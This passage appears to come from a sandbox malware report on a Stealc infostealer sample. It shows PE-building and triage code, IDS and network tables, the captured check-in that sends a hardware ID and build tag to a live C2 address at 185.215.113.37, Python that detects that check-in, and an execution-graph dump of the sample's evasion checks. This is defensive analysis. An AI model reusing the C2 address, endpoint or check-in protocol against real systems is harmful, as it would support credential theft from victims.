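        (b"", 0x1000, 0x25b000, b"\xcc" * 0x200, IMAGE_SCN_CNT_INITIALIZED_DATA | RWX),
        (b".rsrc", 0x25c000, 0x1000, b"", IMAGE_SCN_CNT_INITIALIZED_DATA | RW),
        (b".idata", 0x25d000, 0x1000, b"\0" * 0x200, IMAGE_SCN_CNT_INITIALIZED_DATA | RW),
        (b"edqomgnb", 0x507000, 0x1000, bytes(rng.getrandbits(8) for _ in range(0x400)),
         IMAGE_SCN_CNT_INITIALIZED_DATA | RWX),
        (b".taggant", 0x6ac000, 0x3000, b"\xe9" + b"\0" * 0x21ff, IMAGE_SCN_CNT_INITIALIZED_DATA | RWX),
    ]
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)               # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, len(layout), 0x66F99A4A, 0, 0, 0xE0, 0x0102)
    opt = struct.pack("<HBBIIIIIII", 0x10B, 10, 0, 0, 0, 0, 0x6ac000, 0x1000, 0x25c000, 0x400000)
    opt += b"\0" * (0xE0 - len(opt))                                  # rest of the PE32 optional header
    raw_ptr = len(dos) + 4 + len(coff) + len(opt) + 40 * len(layout)
    headers, body = b"", b""
    for name, va, vsize, raw, chars in layout:
        headers += struct.pack("<8sIIIIIIHHI", name.ljust(8, b"\0"), vsize, va, len(raw),
                               raw_ptr if raw else 0, 0, 0, 0, 0, chars)
        body, raw_ptr = body + raw, raw_ptr + len(raw)
    return dos + b"PE\0\0" + coff + opt + headers + body


if __name__ == "__main__":
    for key, value in triage(build_sample_pe()).items():
        print(f"{key}: {value}")
```

Run against a real file, triage(open(path, "rb").read()) produces the same dictionary; on the constructed sample it reports the entry point in .taggant, three RWX sections, edqomgnb as the only high-entropy section and the unnamed first section as the unpack target, which is the picture the table above paints for the real sample.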
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-07T19:14:13.177285+0200 | 2044243 | ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in | 1 | 192.168.2.8 | 49706 | 185.215.113.37 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 7, 2024 19:14:12.165903091 CEST | 49706 | 80 | 192.168.2.8 | 185.215.113.37
Oct 7, 2024 19:14:12.170775890 CEST | 80 | 49706 | 185.215.113.37 | 192.168.2.8
Oct 7, 2024 19:14:12.170861959 CEST | 49706 | 80 | 192.168.2.8 | 185.215.113.37
Oct 7, 2024 19:14:12.170984030 CEST | 49706 | 80 | 192.168.2.8 | 185.215.113.37
Oct 7, 2024 19:14:12.175935030 CEST | 80 | 49706 | 185.215.113.37 | 192.168.2.8
Oct 7, 2024 19:14:12.933232069 CEST | 80 | 49706 | 185.215.113.37 | 192.168.2.8
Oct 7, 2024 19:14:12.933336973 CEST | 49706 | 80 | 192.168.2.8 | 185.215.113.37
Oct 7, 2024 19:14:12.936276913 CEST | 49706 | 80 | 192.168.2.8 | 185.215.113.37
Oct 7, 2024 19:14:12.941181898 CEST | 80 | 49706 | 185.215.113.37 | 192.168.2.8
Oct 7, 2024 19:14:13.177180052 CEST | 80 | 49706 | 185.215.113.37 | 192.168.2.8
Oct 7, 2024 19:14:13.177284956 CEST | 49706 | 80 | 192.168.2.8 | 185.215.113.37
Oct 7, 2024 19:14:15.881716013 CEST | 49706 | 80 | 192.168.2.8 | 185.215.113.37
                            • 185.215.113.37
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.8 | 49706 | 185.215.113.37 | 80 | 7828 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
Oct 7, 2024 19:14:12.170984030 CEST | 89 | OUT
GET / HTTP/1.1
Host: 185.215.113.37
Connection: Keep-Alive
Cache-Control: no-cache
Oct 7, 2024 19:14:12.933232069 CEST | 203 | IN
HTTP/1.1 200 OK
Date: Mon, 07 Oct 2024 17:14:12 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Oct 7, 2024 19:14:12.936276913 CEST | 412 | OUT
POST /e2b1563c6670f193.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----IEHIIIJDAAAAAAKECBFB
Host: 185.215.113.37
Content-Length: 211
Connection: Keep-Alive
Cache-Control: no-cache
                            Data Raw: 2d 2d 2d 2d 2d 2d 49 45 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 45 35 36 32 38 41 30 32 39 38 46 32 39 36 33 34 39 35 39 37 35 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 46 42 2d 2d 0d 0a
Data Ascii (line breaks restored from the CRLF pairs in the raw bytes):
------IEHIIIJDAAAAAAKECBFB
Content-Disposition: form-data; name="hwid"

AE5628A0298F2963495975
------IEHIIIJDAAAAAAKECBFB
Content-Disposition: form-data; name="build"

doma
------IEHIIIJDAAAAAAKECBFB--
Oct 7, 2024 19:14:13.177180052 CEST | 210 | IN
HTTP/1.1 200 OK
Date: Mon, 07 Oct 2024 17:14:13 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 8
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Data Raw: 59 6d 78 76 59 32 73 3d
Data Ascii: YmxvY2s= (base64 for "block"; this is the last HTTP message in the capture)
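The two transactions above are the entire C2 conversation: a GET / that the server answers with an empty 200, then a multipart POST to /e2b1563c6670f193.php carrying the fields hwid and build, answered with eight bytes of base64 that decode to "block", after which the sample sends nothing else. The following Python, added here as an example and not code from Joe Sandbox, the sample or its C2, parses that captured body using the boundary from the Content-Type header, decodes the reply, and classifies a transaction by the shape of this check-in so the same logic can run over proxy or IDS-extracted HTTP records. CAPTURED_BODY is the request body above rebuilt from its hex dump; the "16 hex digits + .php" path pattern in C2_PATH is an assumption generalised from the single observed URL.

```python
import base64
import re

# Check-in captured in this report, rebuilt from the raw bytes above (CRLF line ends).
CAPTURED_CONTENT_TYPE = "multipart/form-data; boundary=----IEHIIIJDAAAAAAKECBFB"
CAPTURED_BODY = b"\r\n".join([
    b"------IEHIIIJDAAAAAAKECBFB",
    b'Content-Disposition: form-data; name="hwid"',
    b"",
    b"AE5628A0298F2963495975",
    b"------IEHIIIJDAAAAAAKECBFB",
    b'Content-Disposition: form-data; name="build"',
    b"",
    b"doma",
    b"------IEHIIIJDAAAAAAKECBFB--",
    b"",
])
CAPTURED_RESPONSE = b"YmxvY2s="

# Assumption: the one observed C2 path (/e2b1563c6670f193.php) generalises to 16 hex digits + .php.
C2_PATH = re.compile(r"^/[0-9a-f]{16}\.php$")


def parse_multipart(content_type: str, body: bytes) -> dict:
    """Split a multipart/form-data body into {field name: value} using the boundary from
    the Content-Type header; each part is introduced by "--" + boundary and the body is
    closed by "--" + boundary + "--"."""
    m = re.search(r'boundary="?([^";]+)"?', content_type)
    if not m:
        raise ValueError("Content-Type carries no boundary")
    delimiter = b"--" + m.group(1).encode("ascii")
    fields = {}
    for part in body.split(delimiter)[1:]:
        if part.startswith(b"--"):                      # closing delimiter reached
            break
        head, _, value = part.partition(b"\r\n\r\n")    # part headers / part payload
        name = re.search(rb'name="([^"]*)"', head)
        if name:
            fields[name.group(1).decode("ascii")] = value.rstrip(b"\r\n").decode("latin-1")
    return fields


def is_stealc_checkin(method: str, path: str, headers: dict, body: bytes) -> bool:
    """True for a transaction shaped like the captured check-in: a POST to the C2 path
    whose multipart body carries fields named hwid and build. The initial GET / and a
    urlencoded POST with the same field names both fall outside this shape."""
    if method != "POST" or not C2_PATH.match(path):
        return False
    content_type = headers.get("Content-Type", "")
    if not content_type.startswith("multipart/form-data"):
        return False
    try:
        fields = parse_multipart(content_type, body)
    except ValueError:
        return False
    return {"hwid", "build"}.issubset(fields)


def decode_c2_reply(body: bytes) -> str:
    """The server answered with a short base64 string; decode it strictly so that a
    non-base64 reply raises instead of being silently mangled."""
    return base64.b64decode(body, validate=True).decode("latin-1")


if __name__ == "__main__":
    print(parse_multipart(CAPTURED_CONTENT_TYPE, CAPTURED_BODY))
    print(is_stealc_checkin("POST", "/e2b1563c6670f193.php",
                            {"Content-Type": CAPTURED_CONTENT_TYPE}, CAPTURED_BODY))
    print(decode_c2_reply(CAPTURED_RESPONSE))
```

The rebuilt body is exactly 211 bytes, matching the Content-Length the sample sent, which is a quick sanity check that the CRLF structure was restored correctly. The classifier keys on structure (path shape, multipart encoding, the two field names) rather than on the boundary string or the hwid value, both of which vary per run and per victim.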


                            Target ID:1
                            Start time:13:14:06
                            Start date:07/10/2024
                            Path:C:\Users\user\Desktop\file.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\Desktop\file.exe"
                            Imagebase:0x850000
                            File size:1'873'920 bytes
                            MD5 hash:E65A390D1393C0F3CBA1B5BFD5BFF188
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000001.00000002.1472692554.00000000015AE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000001.00000003.1416396834.0000000005200000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                            Reputation:low
                            Has exited:true


                              Execution Graph

                              Execution Coverage:7.7%
                              Dynamic/Decrypted Code Coverage:0%
                              Signature Coverage:3.2%
                              Total number of Nodes:2000
                              Total number of Limit Nodes:25
Execution graph (interactive figure; the node and edge dump is not reproduced). API calls recoverable from the graph nodes, following the call order from the entry function 8669f0:
• 852260 and 8526a0 each call 8545c0 (RtlAllocateHeap, VirtualProtect) in long straight-line sequences, the pattern behind the "potential string decryption / allocating functions" signature
• 869860: GetPEB, five LoadLibraryA calls, then a chain of GetProcAddress calls (run-time API resolution)
• 8511d0 with 851160, 851110, 8510a0 and 851220: GetSystemInfo, GetCurrentProcess, VirtualAllocExNuma, VirtualAlloc, VirtualFree, GlobalMemoryStatusEx (via 8689b0) and __aulldiv, each check with its own ExitProcess branch
• 866770: GetUserDefaultLangID with five separate ExitProcess branches (the locale check flagged in the overview)
• 851190 with 867850 and 8678e0: GetProcessHeap, RtlAllocateHeap, GetUserNameA, GetComputerNameA, with an ExitProcess branch at 8511c4
• 866ac2: OpenEventA, with one branch to CreateEventA and the other to CloseHandle and Sleep
• 866920: GetSystemTime, string building in 866820, sscanf, SystemTimeToFileTime twice, then an ExitProcess branch at 8669d8
• 865b10 onward: lstrcpy/lstrlen/lstrcat string building (86a740, 86a7a0, 86a820, 86a8a0, 86a9b0), GetWindowsDirectoryA (867500), InternetOpenA (854fb0, after GetProcessHeap and RtlAllocateHeap) and several larger routines whose contents the graph summarises only as call counts (855960, 34 API calls)
API calls 14167->14168 14169 852fb0 14168->14169 14170 8545c0 2 API calls 14169->14170 14171 852fc9 14170->14171 14172 8545c0 2 API calls 14171->14172 14173 852fe2 14172->14173 14174 8545c0 2 API calls 14173->14174 14175 852ffb 14174->14175 14176 8545c0 2 API calls 14175->14176 14177 853014 14176->14177 14178 8545c0 2 API calls 14177->14178 14179 85302d 14178->14179 14180 8545c0 2 API calls 14179->14180 14181 853046 14180->14181 14182 8545c0 2 API calls 14181->14182 14183 85305f 14182->14183 14184 8545c0 2 API calls 14183->14184 14185 853078 14184->14185 14186 8545c0 2 API calls 14185->14186 14187 853091 14186->14187 14188 8545c0 2 API calls 14187->14188 14189 8530aa 14188->14189 14190 8545c0 2 API calls 14189->14190 14191 8530c3 14190->14191 14192 8545c0 2 API calls 14191->14192 14193 8530dc 14192->14193 14194 8545c0 2 API calls 14193->14194 14195 8530f5 14194->14195 14196 8545c0 2 API calls 14195->14196 14197 85310e 14196->14197 14198 8545c0 2 API calls 14197->14198 14199 853127 14198->14199 14200 8545c0 2 API calls 14199->14200 14201 853140 14200->14201 14202 8545c0 2 API calls 14201->14202 14203 853159 14202->14203 14204 8545c0 2 API calls 14203->14204 14205 853172 14204->14205 14206 8545c0 2 API calls 14205->14206 14207 85318b 14206->14207 14208 8545c0 2 API calls 14207->14208 14209 8531a4 14208->14209 14210 8545c0 2 API calls 14209->14210 14211 8531bd 14210->14211 14212 8545c0 2 API calls 14211->14212 14213 8531d6 14212->14213 14214 8545c0 2 API calls 14213->14214 14215 8531ef 14214->14215 14216 8545c0 2 API calls 14215->14216 14217 853208 14216->14217 14218 8545c0 2 API calls 14217->14218 14219 853221 14218->14219 14220 8545c0 2 API calls 14219->14220 14221 85323a 14220->14221 14222 8545c0 2 API calls 14221->14222 14223 853253 14222->14223 14224 8545c0 2 API calls 14223->14224 14225 85326c 14224->14225 14226 8545c0 2 API calls 14225->14226 14227 853285 14226->14227 14228 8545c0 2 API calls 14227->14228 14229 85329e 14228->14229 14230 8545c0 2 API calls 
14229->14230 14231 8532b7 14230->14231 14232 8545c0 2 API calls 14231->14232 14233 8532d0 14232->14233 14234 8545c0 2 API calls 14233->14234 14235 8532e9 14234->14235 14236 8545c0 2 API calls 14235->14236 14237 853302 14236->14237 14238 8545c0 2 API calls 14237->14238 14239 85331b 14238->14239 14240 8545c0 2 API calls 14239->14240 14241 853334 14240->14241 14242 8545c0 2 API calls 14241->14242 14243 85334d 14242->14243 14244 8545c0 2 API calls 14243->14244 14245 853366 14244->14245 14246 8545c0 2 API calls 14245->14246 14247 85337f 14246->14247 14248 8545c0 2 API calls 14247->14248 14249 853398 14248->14249 14250 8545c0 2 API calls 14249->14250 14251 8533b1 14250->14251 14252 8545c0 2 API calls 14251->14252 14253 8533ca 14252->14253 14254 8545c0 2 API calls 14253->14254 14255 8533e3 14254->14255 14256 8545c0 2 API calls 14255->14256 14257 8533fc 14256->14257 14258 8545c0 2 API calls 14257->14258 14259 853415 14258->14259 14260 8545c0 2 API calls 14259->14260 14261 85342e 14260->14261 14262 8545c0 2 API calls 14261->14262 14263 853447 14262->14263 14264 8545c0 2 API calls 14263->14264 14265 853460 14264->14265 14266 8545c0 2 API calls 14265->14266 14267 853479 14266->14267 14268 8545c0 2 API calls 14267->14268 14269 853492 14268->14269 14270 8545c0 2 API calls 14269->14270 14271 8534ab 14270->14271 14272 8545c0 2 API calls 14271->14272 14273 8534c4 14272->14273 14274 8545c0 2 API calls 14273->14274 14275 8534dd 14274->14275 14276 8545c0 2 API calls 14275->14276 14277 8534f6 14276->14277 14278 8545c0 2 API calls 14277->14278 14279 85350f 14278->14279 14280 8545c0 2 API calls 14279->14280 14281 853528 14280->14281 14282 8545c0 2 API calls 14281->14282 14283 853541 14282->14283 14284 8545c0 2 API calls 14283->14284 14285 85355a 14284->14285 14286 8545c0 2 API calls 14285->14286 14287 853573 14286->14287 14288 8545c0 2 API calls 14287->14288 14289 85358c 14288->14289 14290 8545c0 2 API calls 14289->14290 14291 8535a5 14290->14291 14292 8545c0 2 API calls 14291->14292 
14293 8535be 14292->14293 14294 8545c0 2 API calls 14293->14294 14295 8535d7 14294->14295 14296 8545c0 2 API calls 14295->14296 14297 8535f0 14296->14297 14298 8545c0 2 API calls 14297->14298 14299 853609 14298->14299 14300 8545c0 2 API calls 14299->14300 14301 853622 14300->14301 14302 8545c0 2 API calls 14301->14302 14303 85363b 14302->14303 14304 8545c0 2 API calls 14303->14304 14305 853654 14304->14305 14306 8545c0 2 API calls 14305->14306 14307 85366d 14306->14307 14308 8545c0 2 API calls 14307->14308 14309 853686 14308->14309 14310 8545c0 2 API calls 14309->14310 14311 85369f 14310->14311 14312 8545c0 2 API calls 14311->14312 14313 8536b8 14312->14313 14314 8545c0 2 API calls 14313->14314 14315 8536d1 14314->14315 14316 8545c0 2 API calls 14315->14316 14317 8536ea 14316->14317 14318 8545c0 2 API calls 14317->14318 14319 853703 14318->14319 14320 8545c0 2 API calls 14319->14320 14321 85371c 14320->14321 14322 8545c0 2 API calls 14321->14322 14323 853735 14322->14323 14324 8545c0 2 API calls 14323->14324 14325 85374e 14324->14325 14326 8545c0 2 API calls 14325->14326 14327 853767 14326->14327 14328 8545c0 2 API calls 14327->14328 14329 853780 14328->14329 14330 8545c0 2 API calls 14329->14330 14331 853799 14330->14331 14332 8545c0 2 API calls 14331->14332 14333 8537b2 14332->14333 14334 8545c0 2 API calls 14333->14334 14335 8537cb 14334->14335 14336 8545c0 2 API calls 14335->14336 14337 8537e4 14336->14337 14338 8545c0 2 API calls 14337->14338 14339 8537fd 14338->14339 14340 8545c0 2 API calls 14339->14340 14341 853816 14340->14341 14342 8545c0 2 API calls 14341->14342 14343 85382f 14342->14343 14344 8545c0 2 API calls 14343->14344 14345 853848 14344->14345 14346 8545c0 2 API calls 14345->14346 14347 853861 14346->14347 14348 8545c0 2 API calls 14347->14348 14349 85387a 14348->14349 14350 8545c0 2 API calls 14349->14350 14351 853893 14350->14351 14352 8545c0 2 API calls 14351->14352 14353 8538ac 14352->14353 14354 8545c0 2 API calls 14353->14354 14355 8538c5 
14354->14355 14356 8545c0 2 API calls 14355->14356 14357 8538de 14356->14357 14358 8545c0 2 API calls 14357->14358 14359 8538f7 14358->14359 14360 8545c0 2 API calls 14359->14360 14361 853910 14360->14361 14362 8545c0 2 API calls 14361->14362 14363 853929 14362->14363 14364 8545c0 2 API calls 14363->14364 14365 853942 14364->14365 14366 8545c0 2 API calls 14365->14366 14367 85395b 14366->14367 14368 8545c0 2 API calls 14367->14368 14369 853974 14368->14369 14370 8545c0 2 API calls 14369->14370 14371 85398d 14370->14371 14372 8545c0 2 API calls 14371->14372 14373 8539a6 14372->14373 14374 8545c0 2 API calls 14373->14374 14375 8539bf 14374->14375 14376 8545c0 2 API calls 14375->14376 14377 8539d8 14376->14377 14378 8545c0 2 API calls 14377->14378 14379 8539f1 14378->14379 14380 8545c0 2 API calls 14379->14380 14381 853a0a 14380->14381 14382 8545c0 2 API calls 14381->14382 14383 853a23 14382->14383 14384 8545c0 2 API calls 14383->14384 14385 853a3c 14384->14385 14386 8545c0 2 API calls 14385->14386 14387 853a55 14386->14387 14388 8545c0 2 API calls 14387->14388 14389 853a6e 14388->14389 14390 8545c0 2 API calls 14389->14390 14391 853a87 14390->14391 14392 8545c0 2 API calls 14391->14392 14393 853aa0 14392->14393 14394 8545c0 2 API calls 14393->14394 14395 853ab9 14394->14395 14396 8545c0 2 API calls 14395->14396 14397 853ad2 14396->14397 14398 8545c0 2 API calls 14397->14398 14399 853aeb 14398->14399 14400 8545c0 2 API calls 14399->14400 14401 853b04 14400->14401 14402 8545c0 2 API calls 14401->14402 14403 853b1d 14402->14403 14404 8545c0 2 API calls 14403->14404 14405 853b36 14404->14405 14406 8545c0 2 API calls 14405->14406 14407 853b4f 14406->14407 14408 8545c0 2 API calls 14407->14408 14409 853b68 14408->14409 14410 8545c0 2 API calls 14409->14410 14411 853b81 14410->14411 14412 8545c0 2 API calls 14411->14412 14413 853b9a 14412->14413 14414 8545c0 2 API calls 14413->14414 14415 853bb3 14414->14415 14416 8545c0 2 API calls 14415->14416 14417 853bcc 14416->14417 
14418 8545c0 2 API calls 14417->14418 14419 853be5 14418->14419 14420 8545c0 2 API calls 14419->14420 14421 853bfe 14420->14421 14422 8545c0 2 API calls 14421->14422 14423 853c17 14422->14423 14424 8545c0 2 API calls 14423->14424 14425 853c30 14424->14425 14426 8545c0 2 API calls 14425->14426 14427 853c49 14426->14427 14428 8545c0 2 API calls 14427->14428 14429 853c62 14428->14429 14430 8545c0 2 API calls 14429->14430 14431 853c7b 14430->14431 14432 8545c0 2 API calls 14431->14432 14433 853c94 14432->14433 14434 8545c0 2 API calls 14433->14434 14435 853cad 14434->14435 14436 8545c0 2 API calls 14435->14436 14437 853cc6 14436->14437 14438 8545c0 2 API calls 14437->14438 14439 853cdf 14438->14439 14440 8545c0 2 API calls 14439->14440 14441 853cf8 14440->14441 14442 8545c0 2 API calls 14441->14442 14443 853d11 14442->14443 14444 8545c0 2 API calls 14443->14444 14445 853d2a 14444->14445 14446 8545c0 2 API calls 14445->14446 14447 853d43 14446->14447 14448 8545c0 2 API calls 14447->14448 14449 853d5c 14448->14449 14450 8545c0 2 API calls 14449->14450 14451 853d75 14450->14451 14452 8545c0 2 API calls 14451->14452 14453 853d8e 14452->14453 14454 8545c0 2 API calls 14453->14454 14455 853da7 14454->14455 14456 8545c0 2 API calls 14455->14456 14457 853dc0 14456->14457 14458 8545c0 2 API calls 14457->14458 14459 853dd9 14458->14459 14460 8545c0 2 API calls 14459->14460 14461 853df2 14460->14461 14462 8545c0 2 API calls 14461->14462 14463 853e0b 14462->14463 14464 8545c0 2 API calls 14463->14464 14465 853e24 14464->14465 14466 8545c0 2 API calls 14465->14466 14467 853e3d 14466->14467 14468 8545c0 2 API calls 14467->14468 14469 853e56 14468->14469 14470 8545c0 2 API calls 14469->14470 14471 853e6f 14470->14471 14472 8545c0 2 API calls 14471->14472 14473 853e88 14472->14473 14474 8545c0 2 API calls 14473->14474 14475 853ea1 14474->14475 14476 8545c0 2 API calls 14475->14476 14477 853eba 14476->14477 14478 8545c0 2 API calls 14477->14478 14479 853ed3 14478->14479 14480 8545c0 2 
API calls 14479->14480 14481 853eec 14480->14481 14482 8545c0 2 API calls 14481->14482 14483 853f05 14482->14483 14484 8545c0 2 API calls 14483->14484 14485 853f1e 14484->14485 14486 8545c0 2 API calls 14485->14486 14487 853f37 14486->14487 14488 8545c0 2 API calls 14487->14488 14489 853f50 14488->14489 14490 8545c0 2 API calls 14489->14490 14491 853f69 14490->14491 14492 8545c0 2 API calls 14491->14492 14493 853f82 14492->14493 14494 8545c0 2 API calls 14493->14494 14495 853f9b 14494->14495 14496 8545c0 2 API calls 14495->14496 14497 853fb4 14496->14497 14498 8545c0 2 API calls 14497->14498 14499 853fcd 14498->14499 14500 8545c0 2 API calls 14499->14500 14501 853fe6 14500->14501 14502 8545c0 2 API calls 14501->14502 14503 853fff 14502->14503 14504 8545c0 2 API calls 14503->14504 14505 854018 14504->14505 14506 8545c0 2 API calls 14505->14506 14507 854031 14506->14507 14508 8545c0 2 API calls 14507->14508 14509 85404a 14508->14509 14510 8545c0 2 API calls 14509->14510 14511 854063 14510->14511 14512 8545c0 2 API calls 14511->14512 14513 85407c 14512->14513 14514 8545c0 2 API calls 14513->14514 14515 854095 14514->14515 14516 8545c0 2 API calls 14515->14516 14517 8540ae 14516->14517 14518 8545c0 2 API calls 14517->14518 14519 8540c7 14518->14519 14520 8545c0 2 API calls 14519->14520 14521 8540e0 14520->14521 14522 8545c0 2 API calls 14521->14522 14523 8540f9 14522->14523 14524 8545c0 2 API calls 14523->14524 14525 854112 14524->14525 14526 8545c0 2 API calls 14525->14526 14527 85412b 14526->14527 14528 8545c0 2 API calls 14527->14528 14529 854144 14528->14529 14530 8545c0 2 API calls 14529->14530 14531 85415d 14530->14531 14532 8545c0 2 API calls 14531->14532 14533 854176 14532->14533 14534 8545c0 2 API calls 14533->14534 14535 85418f 14534->14535 14536 8545c0 2 API calls 14535->14536 14537 8541a8 14536->14537 14538 8545c0 2 API calls 14537->14538 14539 8541c1 14538->14539 14540 8545c0 2 API calls 14539->14540 14541 8541da 14540->14541 14542 8545c0 2 API calls 
14541->14542 14543 8541f3 14542->14543 14544 8545c0 2 API calls 14543->14544 14545 85420c 14544->14545 14546 8545c0 2 API calls 14545->14546 14547 854225 14546->14547 14548 8545c0 2 API calls 14547->14548 14549 85423e 14548->14549 14550 8545c0 2 API calls 14549->14550 14551 854257 14550->14551 14552 8545c0 2 API calls 14551->14552 14553 854270 14552->14553 14554 8545c0 2 API calls 14553->14554 14555 854289 14554->14555 14556 8545c0 2 API calls 14555->14556 14557 8542a2 14556->14557 14558 8545c0 2 API calls 14557->14558 14559 8542bb 14558->14559 14560 8545c0 2 API calls 14559->14560 14561 8542d4 14560->14561 14562 8545c0 2 API calls 14561->14562 14563 8542ed 14562->14563 14564 8545c0 2 API calls 14563->14564 14565 854306 14564->14565 14566 8545c0 2 API calls 14565->14566 14567 85431f 14566->14567 14568 8545c0 2 API calls 14567->14568 14569 854338 14568->14569 14570 8545c0 2 API calls 14569->14570 14571 854351 14570->14571 14572 8545c0 2 API calls 14571->14572 14573 85436a 14572->14573 14574 8545c0 2 API calls 14573->14574 14575 854383 14574->14575 14576 8545c0 2 API calls 14575->14576 14577 85439c 14576->14577 14578 8545c0 2 API calls 14577->14578 14579 8543b5 14578->14579 14580 8545c0 2 API calls 14579->14580 14581 8543ce 14580->14581 14582 8545c0 2 API calls 14581->14582 14583 8543e7 14582->14583 14584 8545c0 2 API calls 14583->14584 14585 854400 14584->14585 14586 8545c0 2 API calls 14585->14586 14587 854419 14586->14587 14588 8545c0 2 API calls 14587->14588 14589 854432 14588->14589 14590 8545c0 2 API calls 14589->14590 14591 85444b 14590->14591 14592 8545c0 2 API calls 14591->14592 14593 854464 14592->14593 14594 8545c0 2 API calls 14593->14594 14595 85447d 14594->14595 14596 8545c0 2 API calls 14595->14596 14597 854496 14596->14597 14598 8545c0 2 API calls 14597->14598 14599 8544af 14598->14599 14600 8545c0 2 API calls 14599->14600 14601 8544c8 14600->14601 14602 8545c0 2 API calls 14601->14602 14603 8544e1 14602->14603 14604 8545c0 2 API calls 14603->14604 
14605 8544fa 14604->14605 14606 8545c0 2 API calls 14605->14606 14607 854513 14606->14607 14608 8545c0 2 API calls 14607->14608 14609 85452c 14608->14609 14610 8545c0 2 API calls 14609->14610 14611 854545 14610->14611 14612 8545c0 2 API calls 14611->14612 14613 85455e 14612->14613 14614 8545c0 2 API calls 14613->14614 14615 854577 14614->14615 14616 8545c0 2 API calls 14615->14616 14617 854590 14616->14617 14618 8545c0 2 API calls 14617->14618 14619 8545a9 14618->14619 14620 869c10 14619->14620 14621 86a036 8 API calls 14620->14621 14622 869c20 43 API calls 14620->14622 14623 86a146 14621->14623 14624 86a0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14621->14624 14622->14621 14625 86a216 14623->14625 14626 86a153 8 API calls 14623->14626 14624->14623 14627 86a21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14625->14627 14628 86a298 14625->14628 14626->14625 14627->14628 14629 86a337 14628->14629 14630 86a2a5 6 API calls 14628->14630 14631 86a344 9 API calls 14629->14631 14632 86a41f 14629->14632 14630->14629 14631->14632 14633 86a4a2 14632->14633 14634 86a428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14632->14634 14635 86a4dc 14633->14635 14636 86a4ab GetProcAddress GetProcAddress 14633->14636 14634->14633 14637 86a515 14635->14637 14638 86a4e5 GetProcAddress GetProcAddress 14635->14638 14636->14635 14639 86a612 14637->14639 14640 86a522 10 API calls 14637->14640 14638->14637 14641 86a67d 14639->14641 14642 86a61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14639->14642 14640->14639 14643 86a686 GetProcAddress 14641->14643 14644 86a69e 14641->14644 14642->14641 14643->14644 14645 86a6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14644->14645 14646 865ca3 14644->14646 14645->14646 14647 851590 14646->14647 15767 851670 14647->15767 14650 86a7a0 lstrcpy 14651 8515b5 14650->14651 14652 86a7a0 lstrcpy 14651->14652 14653 8515c7 14652->14653 
14654 86a7a0 lstrcpy 14653->14654 14655 8515d9 14654->14655 14656 86a7a0 lstrcpy 14655->14656 14657 851663 14656->14657 14658 865510 14657->14658 14659 865521 14658->14659 14660 86a820 2 API calls 14659->14660 14661 86552e 14660->14661 14662 86a820 2 API calls 14661->14662 14663 86553b 14662->14663 14664 86a820 2 API calls 14663->14664 14665 865548 14664->14665 14666 86a740 lstrcpy 14665->14666 14667 865555 14666->14667 14668 86a740 lstrcpy 14667->14668 14669 865562 14668->14669 14670 86a740 lstrcpy 14669->14670 14671 86556f 14670->14671 14672 86a740 lstrcpy 14671->14672 14711 86557c 14672->14711 14673 8652c0 25 API calls 14673->14711 14674 8651f0 20 API calls 14674->14711 14675 865643 StrCmpCA 14675->14711 14676 8656a0 StrCmpCA 14677 8657dc 14676->14677 14676->14711 14678 86a8a0 lstrcpy 14677->14678 14679 8657e8 14678->14679 14680 86a820 2 API calls 14679->14680 14682 8657f6 14680->14682 14681 865856 StrCmpCA 14683 865991 14681->14683 14681->14711 14684 86a820 2 API calls 14682->14684 14686 86a8a0 lstrcpy 14683->14686 14685 865805 14684->14685 14687 851670 lstrcpy 14685->14687 14688 86599d 14686->14688 14709 865811 14687->14709 14691 86a820 2 API calls 14688->14691 14689 86a740 lstrcpy 14689->14711 14690 86a820 lstrlen lstrcpy 14690->14711 14693 8659ab 14691->14693 14692 865a0b StrCmpCA 14695 865a16 Sleep 14692->14695 14696 865a28 14692->14696 14694 86a820 2 API calls 14693->14694 14698 8659ba 14694->14698 14695->14711 14699 86a8a0 lstrcpy 14696->14699 14697 86a7a0 lstrcpy 14697->14711 14700 851670 lstrcpy 14698->14700 14701 865a34 14699->14701 